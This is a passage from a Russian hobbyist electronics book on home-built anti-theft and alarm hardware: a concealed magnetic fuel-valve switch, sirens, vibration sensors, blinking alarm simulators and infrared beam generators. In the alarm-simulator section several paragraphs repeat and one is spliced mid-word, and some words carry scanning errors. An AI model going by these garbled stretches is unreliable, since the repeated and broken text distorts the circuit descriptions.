Решением этой проблемы может служить самодельное устройство, выделенное на рис. 3.2 пунктиром. Оно представляет собой токовое герконовое реле К1, обеспечивающее режим самоподхвата. Токовое репе не следует путать с обычными реле, которые выпускает промышленность — такое купить готовое вам не удастся.

Реле К1 включается вместо тумблера в цепь подачи питания на обмотку бензоклапана К2 и работает следующим образом.'При включении зажигания контакты геркона разомкнуты и клапан обесточен, соответственно будет перекрыт бензопровод. Чтобы включить контакты геркона К1.1, необходимо к ним поднести небольшой магнит.

3-12.jpg

Устройство срабатывает при приближении магнита на расстояние 10...20 мм (зависит от силы магнита). В этом случае в цепи обмотки К1 от "+" аккумулятора начнет протекать ток через обмотку К2. Данный электроклапан при напряжении 13 В потребляет ток около 0,3 А.

Обмотка К1 конструктивно расположена на корпусе геркона и ее параметры выбраны таким образом чтобы электромагнитное поле, возникающее от проходящего через обмотку тока, смогло поддерживать контакты К1.1 во включенном состоянии и после убирания магнита. Таким образом, устройство зафиксируется в этом состоянии.

Выключается же реле К1 и клапан К2 после обесточивания цепи при помощи выключения замка зажигания. Что удобно, так как позволит не забыть выключить бензоклапан при постановке машины на охрану.

Конструктивное исполнение токового реле К1 показано на рис. 3.3. Оно изготавливается следующим образом. У обычного геркона типа КЭМ-1 (с одной группой нормально разомкнутых контактов) укорачивается до 5 мм один из выводов. В последующем туда будет подпаиваться конец обмотки. Затем геркон оборачивается в 2 слоя стеклотканью. Причем, под последний слой подкладывается толстый медный провод (диаметром 0,5...1 мм), который

будет служить вторым выводом реле при подпайке конца обмотки. Конец провода должен выступать за край корпуса геркона примерно на 15 мм.

3-13.jpg

Подпаяв к укороченному концу геркона провод, производим намотку катушки. Обмотка содержит около 400 витков, намотанных проводом ПЭТВ или ПЭВ-2 диаметром 0,25 мм. Намотка осуществляется виток к витку на всю длину корпуса в два слоя — это примерно 45 мм. Таким образом, оба вывода обмотки К1 будут находиться с одной стороны геркона, как это показано на рисунке. После окончания намотки обмотку необходимо пропитать лаком или клеем "Момент". На обмотку можно также одеть термоусаживающуюся трубку. В результате получится прочный цилиндр диаметром 10...11 мм с выходящими по краям проводами.

Теперь необходимо произвести определение правильной фазировки подключения обмотки токового реле. Для этого, до того как вы установите устройство в автомобиль, соберите схему подключения, показанную на рис. 3.2 и поднесите к геркону магнит. Если он уверенно сработает, то фазировка правильная. А если вы услышите характерное дребезжание контактов, то нужно поменять местами провода, подключаемые к геркону (правильную полярность следует запомнить).

Токовое реле К1 можно положить под ковриком обшивки в месте, исключающем механическую нагрузку. Для удобства крепления геркона в любом другом месте и увеличения механической прочности всей конструкции можно изготовить пластину, показанную на рис. 3.4. Она выполняется из одностороннего фольгированного стеклотекстолита толщиной 1.5...3 мм. К оставленным участкам фольги припаиваются выводы геркона и внешние подходящие провода. Сама же плата крепится к корпусу автомобиля винтом-саморезом через крепежное отверстие или клеем.

3-14.jpg

Данная конструкция реле устойчиво работает при минимальном токе в цепи 200 мА и падении напряжения на обмотке меньше 1 В. Максимальный ток через обмотку К1 может быть до 0,5 А. При необходимости работы на большем токе, например, если применяемый бензоклапан потребляет больше чем указано, обмотку потребуется выполнять более толстым проводом (число витков при этом уменьшится). Контакты геркона КЭМ-1 рассчитаны на коммутацию тока до 2 А. Другие типы герконов применять нельзя, так как они требуют большего магнитного поля для удержания контактов или же не допускают протекания через контакты тока более 250 мА.

Магнит можно оформить в виде брелка к ключам (лучше использовать магниты, изготовленные на основе самарий-кобальтового материала — они при малых габаритах имеют сильное магнитное поле).

Эксплуатация секретного магнитного включателя К1 будет более удобной, если схему дополнить цепью с лампой индикации, показанной на рис. 3.2 пунктиром. Лампочка EL1 начнет светиться в случае включения бензоклапана и вы будете уверены в том, что на него подано напряжение. Лампу удобно использовать одну из уже имеющихся на панели приборов. Вместо лампы можно применить также любой светодиод с последовательно включенным резистором сопротивлением 1.2...3 кОм, ограничивающим ток.

Таким образом, угонщик, даже нейтрализовав вашу противоугонную систему, будет весьма озадачен тем, что автомобиль, проехав 100...500 м (за счет остатка бензина в трубопроводе), неожиданно заглох и вообще не заводится. Конечно, многие из них догадаются о бензоклапане и поэтому начнут искать тумблер включения, которого в данной ситуации вообще нет. Перспектива же поиска неизвестно где установленного бензоклапана, а потом напрямую соединять бензопровод при дефиците времени может побудить отказаться от угона автомобиля.

Правильно изготовленное и грамотно установленное предлагаемое устройство совместно с электронной сигнализацией может стать серьезным препятствием для угонщиков. Если же установить еще и механический блокиратор руля, то в итоге у вас получится комплексная защита автомобиля от угона, что в данной конфигурации:

недорогая электронная система, бензоклапан и блокиратор — на мой взгляд, является наиболее рациональной и экономичной.

внешний вид бензоклапана

Изображение: 

конструкция токового реле

Изображение: 

пластина для крепления

Изображение: 

схема включения токового реле и бензоклапана

Изображение: 

2. Карманный звуковой сигнализатор

Карманный звуковой сигнализатор

Это устройство отличается своей простотой и малыми габаритами. Оно издает довольно неприятный звук и может использоваться как индивидуальное средство подачи сигнала тревоги, чтобы привлечь внимание окружающих или же применяться в составе любой системы охранной сигнализации.

3-21.jpg

При изготовлении сирены использована широко распространенная микросхема звукового усилителя К174УН14 (TDA2003), которая включена в режиме автогенератора, рис. 3.5. На ее выходе будут прямоугольные импульсы. При этом частота звука определяется емкостью конденсатора С2 и в небольших пределах может меняться подстроенным резистором R2.

В схеме генератора используется особенность внутренней структуры микросхемы. Внутри корпуса уже имеется резистор отрицательной обратной связи между выходом (вывод 4) и входом (2), а положительная обратная связь на вход DA1/1 поступает с делителя, состоящего из резисторов R1-R2.

Рабочая частота автогенератора настраивается на максимальную громкость звука. Частота в этом случае будет совпадать с резонансной для пьезоизлучателя (обычно это около 2...4 кГц — зависит от типа используемого звукового излучателя).

Для того чтобы схема меньше потребляла энергии, в качестве звукового сигнализатора применяется пьезоизлучатель СП-1 (в крайнем случае подойдут два пьезоизлучателя ЗП-1).

Для получения максимальной отдачи от пьезоизлучателя (В1) на него требуется подать повышенное переменное напряжение (с амплитудой не менее 25 В). Это достигается при помощи включения В1 через автотрансформатор Т1.

Автотрансформатор можно изготовить самостоятельно на основе железа от выходного или согласующего трансформатора, применяемого в малогабаритных радиоприемниках. Имеющиеся в них обмотки удаляем, а на их место наматываем 100+800 витков проводом ПЭВ диаметром 0,1 мм.

В качестве Т1 удобно использовать также трансформатор от старых моделей телефонных аппаратов. Потребуется только удалить верхнюю обмотку и вместо нее намотать 100...150 витков таким же проводом. Число витков в обмотке (2-3) зависит от напряжения питания схемы и берется максимальным при Uпит=9...12 В.

Если предполагается работа автогенератора в долговременном режиме — микросхема DA1 крепится к теппоотводу.

Цепь из элементов R3-C4 предотвращает возбуждение автогенератора на более высоких частотах.

Схема автогенератора сохраняет работоспособность при изменении питающего напряжения от 2,7 до 15В. Потребляемый ток составляет при 3 В — 30 мА, 10В — 200 мА. В автономном варианте в качестве элементов питания могут использоваться три или четыре аккумулятора Д-0.26Д.

Схема не критична к точности номиналов и типам используемых радиодеталей. Единственное требование к ним — малые габариты, например подстроечный резистор R2 типа СПЗ-19а.

Все детали схемы, кроме трансформатора Т1, размещаются на односторонней печатной плате размером 35х25 мм, рис. 3.6.

3-22.jpg

Рис. 3.5 Принципиальная схема звукового сигнализатора

Изображение: 

Рис. 3.6 Топология печатной платы и расположение элементов

Изображение: 

3. Звуковой сигнализатор с меняющейся частотой звука

Звуковой сигнализатор с меняющейся частотой звука

На основе интегральной микросхемы звукового усилителя К174УН14 (TDA2003) можно выполнить звуковой сигнализатор с изменяемой частотой звука, рис. 3.7. Сам звуковой генератор (DA1) собран по схеме, описанной в предыдущей статье. Единственное отличие заключается в использовании дополнительного транзистора VT1 и двух низкочастотных генераторов, собранных на логических элементах КМОП микросхемы DD1.

Генератор, выполненный на элементах DD1.3, DD1.5, работает на частоте 0.7...1 Гц. Сигнал с выхода DD1.6 поступает через резисторы R6-R7 на управление транзистором VT1, что обеспечивает изменение частоты звука. Частота на выходе DA1/4 генератора будет циклически меняться в зависимости от изменения сопротивления эмиттер-коллектор транзистора VT1. При этом в зависимости от положения переключателя SA1 сигнализатор может работать в одном из трех режимов:

3-31.jpg

1) непрерывный сигнал одной частоты;

2) сигнал с изменяемой частотой, при этом будут чередоваться интервалы звучания сирены и однотонного звука;

3) сигнал с изменяемой частотой.

Генератор на элементах DD1.1-DD1.2 управляет работой второго генератора (DD1.3, DD1.5). Когда на выводе DD1/6 присутствует уровень лог. "1" (он через диод VD1 поступает на DD1/13) — второй генератор перестает работать и на выходе будет однотонный звук.

Настройка схемы заключается в установке резисторами R8 и R6 необходимого диапазона перестройки частоты, а также частоты, с которой будет чередоваться смена звука, что зависит от номиналов элементов R3 и С1.

Все элементы, выделенные на схеме пунктиром, размещены на односторонней печатной плате размером 57,5х40 мм, рис. 3.8.

Устройство не критично к типам применяемых деталей и точности соответствия номиналов. Подстроенные резисторы (R6 и R8) использованы малогабаритные: типа СПЗ-19а.

В качестве звукового излучателя (ВА1) может быть применен пьезосигнализатор ОСА-110. Он имеет габариты 70х70х35 мм и обеспечивает параметры:

громкость звука на расстоянии 1 м не менее 110дБ;

резонансную частоту 2,2±0,5 кГц;

подводимую амплитуду сигнала до 200 В;

диапазон рабочих температур-45...+55°С.

Для работы пьезоизлучатепя с максимальной громкостью его питание выполняется через повышающий напряжение автотрансформатор Т1. Для изготовления Т1 удобно использовать магнитопровод трансформатора от старых моделей телефонных аппаратов. Потребуется удалить все обмотки и намотать 1600+80 витков проводом ПЭЛ диаметром 0,12 мм (последние 80 витков выполняются проводом диаметром 0,25 мм).

К выходу генератора может подключаться также и обычный электромагнитный динамик мощностью около 5 Вт и сопротивлением 4 Ом. В этом случае автотрансформатор Т1 не нужен.

3-32.jpg

Устройство работает при питании от источника напряжением от 3 до 15 В. При напряжении 12 В потребляемый ток составляет не более 0,3 А.

Рис. 3.7 Принципиальная электрическая схема звукового сигнализатора

Изображение: 

Рис. 3.8 Топология печатной платы и расположение элементов

Изображение: 

4. Мощная сирена

Мощная сирена

Для звукового оповещения это устройство может применяться в составе любой стационарной или автономной охранной сигнализации. Оно создает плавно меняющийся по частоте звук, похожий на сигнал милицейской сирены. При этом в качестве звукового излучателя может подключаться одновременно (параллельно) много динамиков, но даже при использовании всего одного мощность звукового сигнала будет значительно превосходить пьезосигнализаторы и автомобильные пищалки. Кроме того, сигнал имеет индивидуальный "звуковой рисунок", что позволяет его легко отличить от других.

Схема устройства, рис. 3.9, состоит из двух связанных генераторов, выполненных на микросхеме DD1, и делителя частоты на DD2.1. Частота звукового генератора на элементах DD1.4, DD1.6 циклически меняется полевым транзистором VT1. Так как полевой транзистор изменяет свое сопротивление исток-сток в зависимости от управляющего напряжения на затворе. Управляющее пилообразное напряжение образуется на конденсаторе С2 при помощи второго, более низкочастотного генератора, выполненного на элементах DD1.1-DD1.2, в результате заряда конденсатора С2 через резистор R3 и разряда через R3 и R4 (когда на выводе DD1/6 лог. "0").

На выходе DD1/8 генератора форма импульсов отличается от меандра. Триггер DD2.1 работает в режиме делителя на 2 и обеспечивает на своих выходах симметричные импульсы (пауза равна длительности). Это позволяет исключить подмагничивание обмотки звукового излучателя (динамика) постоянной составляющей протекающего тока, как это бывает в некоторых схемах.

Элемент триггера DD2.2 является повторителем сигналов, которые через резисторы R6 и R7 поступают на управление мостовым коммутатором. Использование мостовой схемы включения динамика (ВА1) позволяет увеличить амплитуду выходного сигнала до уровня, близкого к питающему напряжению (выходная мощность в этом случае также увеличивается). Достигается это тем, что в открытом состоянии могут находиться одновременно только два транзистора (VT2, VT5 или VT3, VT6) — зависит от уровней на выходах DD2.2 (направление протекающего тока через обмотку динамика ВА1 периодически меняется).

В схеме применены конденсаторы С1...СЗ типа К10-17, С4 — типа К52-1 Б на 63 В. Резисторы подойдут любого типа. При использовании только одного динамика транзисторы КТ827 и КТ825 можно заменить на менее мощные КТ972 и КТ973 соответственно. Их нужно устанавливать на радиатор. Динамик ВА1 подойдет мощностью не меньше 20 Вт при сопротивлении обмотки 4 Ом или 10 Вт при 8 Ом.

Все элементы схемы, кроме транзисторов VT2...VT5 и включателя SA1, расположены на односторонней печатной плате размера-

3-41.jpg

ми 55х35 мм, рис. 3.10. Для упрощения топологии плата содержит одну объемную перемычку.

При настройке устройства, из-за разброса параметров полевых транзисторов КП31 ЗА, для получения нужной тональности звучания, номинал конденсатора СЗ необходимо подбирать из диапазона 0,015...0,47 мкФ.

3-42.jpg

Сирена сохраняет работоспособность при изменении питающего напряжения от 6 до 15 В, а потребляемый ток (1...2.5 А) зависит от сопротивления обмотки подключенного динамика и их количества параллельно соединенных.

Выходной каскад сирены вместо четырех транзисторных коммутаторов можно выполнить также на интегральной микросхеме сдвоенного звукового усилителя (TDA2005), как это показано на рис. 3.11. Микросхема применена в режиме мостового включения нагрузки, что позволяет обойтись без переходных конденсаторов в цепи динамика и увеличить максимальную амплитуду напряжения на нагрузке почти до уровня питающего напряжения. Усилитель может работать при изменении питающего напряжения от 6 до 16 В.

Применение интегральной микросхемы позволит уменьшить габариты всего устройства, так как в качестве теплоотвода для TDA2005 может использоваться металлический корпус конструкции.

3-43.jpg

Сопротивление подключенной нагрузки (ВА1) должно быть не меньше 4 Ом. В этом случае максимальная мощность при питающем напряжении 12 В составит около 20 Вт (при Рнагр=8 Ом — Рн=12 Вт). А потребляемый ток не превышает 1,8 А.

Рис. 3.10 Принципиальная плата

Изображение: 

Рис. 3.11 Принципиальная схема выходного каскада, выполненного на микросхеме сдвоенного усилителя (в мостовом включении)

Изображение: 

Рис. 3.9 Принципиальная схема мощной сирены

Изображение: 

5. Датчики колебаний для охранной сигнализации

Датчики колебаний для охранной сигнализации

Кроме обычных контактных датчиков необходимым элементом для любой охранной сигнализации, устанавливаемой на автомобиле, является датчик колебаний. Он должен реагировать также на удары и любые вибрации корпуса. При этом необходимо обеспечить срабатывание, если амплитуда колебаний превысит заданную величину.

В простейших серийных промышленных системах охраны (среднего класса) чаще всего используют один из двух видов датчиков колебаний: выполненные на основе пьезоэффекта или электромагнитной индукции.

В литературе уже публиковались конструкции электромагнитных датчиков, выполненные на основе механизма стрелочного измерительного прибора — микроамперметра [Л20, стр. 86]. Предлагаемый

датчик имеет аналогичный принцип работы (магнитное попе наводит Э. Д. С. в катушке), но его конструкция является более стойкой к механическим перегрузкам, так как в этой колебательной системе катушка закреплена неподвижно, а перемещается только магнит. Вся конструкция позволяет уменьшить габариты датчика.

По сравнению с датчиками, выполненными на основе пьезоэлемента, на данное устройство меньше влияет изменение температуры и оно более чувствительно, особенно к медленным колебаниям корпуса автомобиля.

Датчиком вибрации (ударов) и колебаний является катушка L1 с закрепленным над ней магнитом, рис. 3.12. Магнит крепится клеем "Момент" к латунной пружинящей пластине. Все элементы крепления катушки, показанные на рисунке, использованы латунные (подойдет также любой другой не магнитный материал, например алюминий или пластмасса).

3-51.jpg

Катушка датчика намотана на пластмассовом каркасе, рис. 3.13, проводом ПЭЛ диаметром 0,08...0,1 мм (внавал до заполнения). Это примерно около 1800 витков (в моем варианте индуктивность получилась 3,3 мГн).

При колебаниях магнита в катушке наводится напряжение, которое усиливается операционным усилителем (DA1), рис. 3.14. Операционный усилитель работает без обратной связи — с максимальным коэффициентом усиления, т.е. как компаратор. В исходном состоянии на его выходе DA1/6 будет уровень лог. "0" (не более 0,5 В), а при колебаниях магнита появятся импульсы. Эти импульсы открывают транзистор VT1 и начнет моргать светодиод HL1. Транзистор VT2 должен быть постоянно открыт поданным на базу положительным напряжением в случае если сигнализация включена.

3-52.jpg

3-53.jpg

Стабилитрон VD1 предотвращает повреждение микросхемы повышенным напряжением, а диод VD2 предохраняет от неправильной полярности подачи питания на схему датчика.

Вся схема датчика за счет того, что в нем используется микромощная микросхема, потребляет от источника 12 В в режиме ожидания ток не более 0,1 мА, а при свечении светодиода до 6 мА.

Чувствительность датчика зависит от гибкости пластины, на которой крепится магнит, и может быть довольно высокой. И чтобы ее снизить до нужного уровня, служит регулировочный резистор R2, который позволяет менять порог срабатывания компаратора DA1. Это удобно при неблагоприятных погодных условиях. Например, во время дождя или сильного ветра, когда чувствительность следует уменьшить, чтобы исключить ложные срабатывания. А для удобства настройки чувствительности датчика служит светодиод HL1. Момент срабатывания контролируется по его свечению.

Если датчик будет установлен в самом блоке охраны, то сигнал с коллектора VT1 может сразу подключаться к сигнализации.

При установке устройства в автомобиле следует учитывать, что от места установки, а также плоскости колебаний магнита, зависит чувствительность датчика. Поэтому конструктивно датчик удобнее выполнять в виде отдельного блока, который подключается к сигнализации тремя проводами. Аналогично делают в промышленных системах охраны, например в системе "Red Scorpio-600" третий провод применяется для электронного управления включением датчика (в случае, если вы его не будете использовать, то вместо транзистора VT2 на плате устанавливается перемычка эмиттер-коллектор).

В схеме применены детали: подстроенный резистор R2 типа СП4-9 на 0,5 Вт (СПЗ-166), остальные МЛТ мощностью 0.125 Вт. Транзисторы могут быть с любой последней буквой в обозначении и они заменимы на любые аналогичные с соответствующей проводимостью.

Конденсаторы С1, СЗ из серии К10 (К10-17), оксидный С2 — К50-35 на 25 В. Светодиод HL1 может применяться любого типа.

Для удобства подключения внешних проводов к датчику на плате установлена трехсекционная коммутационная колодка с винтовыми зажимами — она впаивается в плату.

Все детали схемы размещены на односторонней печатной плате из стеклотекстолита, рис. 3.15. Для увеличения плотности монтажа

часть резисторов устанавливается вертикально, а стабилитрон VD1 используется в пластмассовом корпусе.

3-54.jpg

В качестве корпуса удалось найти подходящую пластмассовую коробку, рис. 3.16 (под нее и выполнена плата).

Для подключения удаленного датчика к блоку охраны потребуется собрать переходной узел на транзисторе VT3, рис. 3.17. Он позволяет формировать уровень лог. "1" для системы охраны при срабатывании датчика. При свечении светодиода HL1 в цепи питания датчика увеличивается ток. Этот ток, проходя через резистор R8, создает на нем падение напряжения, достаточное для открывания транзистора VT3.

3-55.jpg

Чувствительность транзистора устанавливается резистором R8, а резистор R7 предотвращает повреждение транзистора VT3 в случае короткого замыкания цепей питания датчика.

Можно также изготовить датчик вибрации на основе цилиндрического пьезоэлемента от головки звукоснимателя, например типа ГЗП-311, рис. 3.18. Такие звукосниматели вряд ли еще производятся, но в продаже из старых запасов пока встречаются. Головка имеет пьезоэпемент в виде трубки. Для его использования в качестве датчика потребуется минимальная доработка. Она заключается в снятии иголки и укорачивании пластмассовых ограничительных выступов (1), как это показано на рисунке. На выступающий конец пьезоэлемента надеваем полиэтиленовую трубку соответствующего диаметра, а на ней закрепляем медную цилиндрическую втулку (2). Втулка имеет внутри центральное отверстие с резьбой М2,5 (резьба обеспечивает лучшее сцепление с полиэтиленовой трубкой, что исключит соскальзывание груза).

3-56.jpg

3-57.jpg

Так как пьезоэлемент имеет гибкое крепление, то малейшие вибрации закрепленного на нем груза (2) преобразуются в напряжение. Схема усилителя для такого датчика может быть аналогичной приведенной выше, но с небольшими изменениями, показанными на рис. 3.19.

Применение такой конструкции пьезодатчика позволяет обеспечить чувствительность к колебаниям в двух плоскостях, а также немного уменьшить габариты устройства.

3-58.jpg

В качестве пьезодатчика возможно также использование пьезоизлучателей из серии ЗП, но в этом случае чувствительность такого устройства уменьшится и срабатывать оно будет только при ударах.

В некоторых серийных импортных сигнализациях используется аналогичная конструкция датчика колебаний на основе пьезоэлемента. Отличие заключается в том, что на пьезоэлемент надета толстая сепиконовая трубка, а на ней уже закреплен груз.

На рис. 3.20 для примера приведена схема так называемого "двухзонного" датчика, выполненного на основе пьезоэлемента. Такие устройства используются в некоторых импортных автомобильных системах охраны. Все устройство собрано на одной микросхеме, содержащей внутри четыре универсальных операционных усилителя.

Датчик имеет два регулятора. Резистор R2 позволяет менять общую чувствительность схемы, a R6 дает возможность устанавливать нужную постоянную времени цепи заряда конденсатора С8, что регулирует чувствительность устройства в зависимости от продолжительности и силы внешних воздействий.

При эксплуатации охраны для облегчения настройки чувствительности датчика в схеме имеются светодиоды HL1, HL2. По их свечению можно контролировать момент срабатывания.

3-59.jpg

Рис. 3.12 Конструкция датчика показана в масштабе М1:1

Изображение: 

Рис. 3.13 Каркас для намотки катушки датчика

Изображение: 

Рис. 3.14 Схема усилителя для датчика

Изображение: 

Рис. 3.15 Топология печатной платы и расположение элементов

Изображение: 

Рис. 3.16 Вид конструкции корпуса датчика

Изображение: 

Рис. 3.17 Схема подключения узла датчика к сигнализации

Изображение: 

Рис. 3.18 Выполнение пьезодатчика из головки звукоснимателя

Изображение: 

Рис. 3.19 Изменения в схеме для подключения к усилтелю пьезодатчика

Изображение: 

Рис. 3.20 Схема усилителя "двухзонного" датчика охранной сигнализации

Изображение: 

6. Имитаторы работы охранного устройства

Имитаторы работы охранного устройства

Многие современные системы сигнализации имеют световую индикацию работы режима охраны, что предупреждает окружающих о нахождении автомобиля под электронной охраной. Индикацию обычно выполняют на светодиоде, работающем в прерывистом режиме. Это успокаивает хозяина, так как может заставить неопытного злоумышленника обойти такой автомобиль стороной.

3-61.jpg

В продаже можно найти мигающие светодиоды со встроенным внутри прерывателем (импортные). По размерам и внешнему виду они не отличаются от обычных, рис. 3.21 (существенно отличается только цена). Например, светодиод типа L-56 (фирмы "KINGBRIGHT") имеет следующие параметры:

максимальное прямое напряжение 2,5 В;

максимальный прямой ток 25 мА;

максимальное обратное напряжение 5 В;

температурный диапазон -40...+85°С.

Минимальное напряжение, при котором начинает работать прерыватель внутри такого светодиода равно 1,5 В (без добавочного резистора). При использовании светодиода с питающим напряжением более 2,5 В необходимо устанавливать токоограничивающий резистор сопротивлением 300...1000 Ом.

Аналогичный сигнализатор может быть установлен в квартире и питаться непосредственно от сети, рис. 3.22. Вор вряд ли будет разбираться, почему мигает индикатор, и поспешит покинуть помещение до возможного приезда наряда милиции или включения сирены.

3-62.jpg

Светодиодный индикатор с прерывистым свечением несложно изготовить самостоятельно на основе любого обычного светодиода и использовать в качестве имитатора работы охранного устройства. Он устанавливается вблизи лобового стекла или приборной панели и может применяться временно, пока не будет установлена охранная сигнализация, или же работать для отвлечения внимания от места установки подключенной сигнализации. В любом случае это полезно.

Работа такого индикатора в прерывистом режиме снижает потребляемую схемой мощность, что особенно важно при питании от автономного источника.

На рис. 3.23 приведена схема прерывателя для управления работой обычного светодиода. Все устройство выполнено на одной КМОП микросхеме и состоит из двух генераторов. Генератор на элементах DD1.3-DD1.6 работает на повышенной частоте, но при свечении светодиода из-за инерции зрения это не заметно. Такой режим позволяет снизить потребляемый индикатором ток.

Второй генератор (DD1.1-DD1.2) вырабатывает импульсы частотой около 1 Гц, что обеспечивает прерывистость свечения светодием более 2,5 В необходимо устанавливать токоограничивающий резистор сопротивлением 300...1000 Ом.

Аналогичный сигнализатор может быть установлен в квартире и питаться непосредственно от сети, рис. 3.22. Вор вряд ли будет разбираться, почему мигает индикатор, и поспешит покинуть помещение до возможного приезда наряда милиции или включения сирены.

3-63.jpg

Светодиодный индикатор с прерывистым свечением несложно изготовить самостоятельно на основе любого обычного светодиода и использовать в качестве имитатора работы охранного устройства. Он устанавливается вблизи лобового стекла или приборной панели и может применяться временно, пока не будет установлена охранная сигнализация, или же работать для отвлечения внимания от места установки подключенной сигнализации. В любом случае это полезно.

Работа такого индикатора в прерывистом режиме снижает потребляемую схемой мощность, что особенно важно при питании от автономного источника.

На рис. 3.23 приведена схема прерывателя для управления работой обычного светодиода. Все устройство выполнено на одной КМОП микросхеме и состоит из двух генераторов. Генератор на элементах DD1.3-DD1.6 работает на повышенной частоте, но при свечении светодиода из-за инерции зрения это не заметно. Такой режим позволяет снизить потребляемый индикатором ток.

Второй генератор (DD1.1-DD1.2) вырабатывает импульсы частотой около 1 Гц, что обеспечивает прерывистость свечения светоди-

3-64.jpg

Рис. 3.21 Подключение светодиода со встроенным прерывателем к аккумулятору

Изображение: 

Рис. 3.22 Питание светодиода со встроенным прерывателем от сети 220В

Изображение: 

Рис. 3.22 Питание светодиода со встроенным прерывателем от сети 220В

Изображение: 

Рис. 3.23 Схема прерывателя для управления двухцветным светодиодом

Изображение: 

6. Инфракрасная техника

Инфракрасная техника

С появлением быстродействующих инфракрасных излучателей, прежде всего - ИК диодов, быстро растет интерес к спектру электромагнитных колебаний, имеющих длину волны l=0,8.. .1,3 мкм. Важной особенностью ИК диода является то, что он способен сконцентрировать в короткой вспышке* мощность Римп, в сотни раз превышающую мощность непрерывного его излучения Рнепр. С соответствующим (в ЦРимп /Рнепр раз) увеличением его «дальнобойности».

ИК излучение может быть пространственно преобразованосжато в узкий пучок, сфокусировано, отражено, изогнуто и др. самыми обычными оптическими средствами - линзами, зеркалами, световодами. Важно и то, что в этом диапазоне электромагнитных излучений земная атмосфера сохраняет достаточно высокую прозрачность.

ИК - свободный диапазон. Работа в нем не требует от кого-то - разрешения, кому-то - оплаты и др. В отличие от СВЧ радиодиапазонов, имеющих тот же характер распространения волн, но уже поделенных между старыми и новыми «хозяевами».

Все это может оказаться существенным и при обычном, традиционном использовании электромагнитного излучения - для нужд связи, например, но особенно - в новых приложениях.

Владельцы современных телевизоров, видеомагнитофонов, кондиционеров и др. уже познакомились с инфракрасной техникой:

пульты дистанционного управления многими бытовыми аппаратами используют кодированное ИК излучение. Но это - лишь одно из его применений.

Устройство невидимого ИК барьера, пересечение которого будет зафиксировано охранной системой, показано на рис. 28. В него входит ИЗ - импульсный генератор-излучатель и ПР - фотоприемник, реагирующий лишь на его импульсы.

2-1.jpg

Рис. 28. ИК барьер

В ИК барьер может быть включено и «зеркало» - пассивный отражатель И К лучей.

Расстояние l, на которое можно разнести фотоприемник и излучатель, зависит от мощности ИК импульсов Римп : l=кЦРимп , где к - коэффициент, учитывающий конструктивные особенности излучателя и реальной чувствительности фотоприемника, его способности выделять на фонепомех сигнал своего ИК излучателя.

Основа инфракрасной техники - импульсные ИК генераторы. Рассмотрим ряд практических их схем и конструкций, которые могут войти в охранную систему нужной конфигурации или быть использованы как-то иначе.

*) Длительность фронта tф и спада tсп ИК вспышки зависит от типа ИК диода. Обычно tф @ tсп=0,1...0,5 мкс. Но существуют ИК диоды, обладающие и значительно большим быстродействием, например, ЗЛ139В с tф @ tсп@0,003 мкс.

 

1. Простой ИК генератор

Простой ИК генератор

Принципиальная схема генератора приведена на рис. 29. На элементах DD1.1, DD1.2 собран мультивибратор, возбуждающийся на частоте F=30...35 Гц (F@1/2R2*C1). Дифференцирующая цепочка R3C2 и элементы DD1.4...DD1.6 формируют в базе нормально закрытого транзистора VT1 импульс тока длительностью tимп@ 10 мкс (tимп@R3*C2), возбуждающий включенный в его коллектор ИК диод VD1. В таблице 5 приведена зависимость амплитуды тока

2-2.jpg

Рис.29. Генератор ИК импульсов

2-3.jpg

Рис. 30. Печатная плата генератора

в ИК диоде Iимп и потребляемого генератором тока Iпотр от напряжения источника питания Uпит.

Печатную плату генератора изготавливают из двустороннего фольгированного стеклотекстолита толщиной 1...1,5 мм (рис. 30). Фольгу со стороны деталей используют лишь в качестве нулевого провода-«земли». В местах пропуска проводников в ней должны быть вытравлены кружки диаметром 1,5...2 мм (на рисунке не показаны), места пайки к нуль-фольге «заземляемых» выводов конденсаторов, резисторов и др. показаны зачерненными квадратами.

В качестве примера на рис. 31 приведена зависимость относительной мощности излучения ИК диода АЛ402 от прямого импульсного тока Iпр.и. Почти линейная их связь и при столь значительном форсаже импульсных токов, которая вообще характерна для ИК диодов, позволяет ориентироваться при расчетах «дальнобойности» системы не на мощность излучения, а на легко контролируемый ток в ИК диоде.

2-4.jpg

Рис. 31. Зависимость относительной мощности излучения от прямого импульсного тока

Таблица 5

Uпит,B

Iимп,A

Iпотр,мА

4,5

0,24

0,40

5,0

0,43

0,57

6.0

0,56

0,96

7,0

0,73

1,50

8,0

0,88

2,10

9.0

1,00

2,80


 

Рис. 30. Печатная плата генератора

Изображение: 

Рис. 31. Зависимость относительной мощности излучения от прямого импульсного тока

Изображение: 

Рис.29. Генератор ИК импульсов

Изображение: 

2. Экономичный ИК генератор

Экономичный ИК генератор

Излучатель ИК датчика, реагирующего на прерывание луча, нередко относят от фотоприемника на 10...20 м и более. Его размещение, удовлетворяющее требованиям охранной техники (скрытность позиции, защита от непогоды, намеренной порчи, блокировки и др.), существенно упростится, если он будет выполнен в виде автономно функционирующего блока. Важнейшим параметром такого излучателя будет, очевидно, его способность максимально эффективно использовать энергозапасы встроенного в него источника питания.

Принципиальная схема энергоэкономичного ИК генератора, формирующего достаточно мощные ИК импульсы, показана на рис. 32.

Режим его работы задан мультивибратором, выполненном на микросхеме DD1, в стоки транзисторов которой введены резисторы R1 и R3, многократно снижающие сквозные токи переходного режима. Частота мультивибратора - F@1/2·R2·C1@40 Гц. Длительность импульса тока, возбуждающего ИК диод BL1, зависит от параметров дифференцирующей цепочки R4C3: tимп@R4·C3@10 мкс. Формирователь DD2.3...DD2.6 преобразуют поступающий на его вход импульс с затянутым спадом в «прямоугольный», открывающий на это время до насыщения нормально закрытый транзистор VT1.

Напряжение питания микросхем зависит от номинала резистора R7, при возможных изменениях Uпит оно должно оставаться в пределах +(3...5) В.

2-5.jpg

Рис. 32. Экономичный генератор ИК импульсов

2-6.jpg

Рис. 33. Печатная плата ИК генератора

2-7.jpg

Рис. 34. Компоновка ИК генератора

Таблица 6

Uпит,B

Iимп,A

Iпотр, мА

4,3

0,36

0,15

5

0,46

0,22

6

0,64

0,31

7

0,85

0,43

8

1,05

0,53

9

1,1.8

0,64

10

1,36

0,75


 

Генератор монтируют на двусторонней печатной плате размером 17,5х55х1,2 мм (рис. 33). Фольгу под деталями используют лишь в качестве нулевой шины-«земли» (с ней соединяют «-» источника питания), в местах пропуска проводников она имеет выборки — кружки диаметром 1,5...2 мм (на рисунке не показаны). Выводы деталей, соединяемые с «землей», припаивают непосредственно к нуль-фольге (показаны зачерненными квадратами).

Транзистор VT1 устанавливают параллельно плате, его выводы согнуты под прямым углом, расстояние между ним и платой - 4...5 мм.

